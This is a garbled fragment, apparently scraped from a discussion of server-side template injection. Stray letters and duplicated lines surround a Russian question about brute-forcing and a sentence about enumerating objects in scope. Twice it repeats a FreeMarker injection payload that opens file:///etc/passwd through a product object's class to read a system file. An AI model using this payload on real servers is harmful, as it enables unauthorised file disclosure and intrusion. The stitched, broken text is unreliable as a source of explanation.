P
Size: a a a
P
S
Enumerate the objects available in the context of your injection
? Это тупо брут-форс или существуют какие-то другие способы?SB
~
Enumerate the objects available in the context of your injection
? Это тупо брут-форс или существуют какие-то другие способы?SB
S
S
SB
SB
<#assign x=product.class.getResource("").toURI().create("file:///etc/passwd").toURL().openConnection().inputStream>
S
<#assign x=product.class.getResource("").toURI().create("file:///etc/passwd").toURL().openConnection().inputStream>
S
_context
object's attributes can be iterated over to see if anything useful is in scope. The XWiki example later illustrates exploiting a developer-provided class.SB
S
WC
q
WC
C
C
WC
WC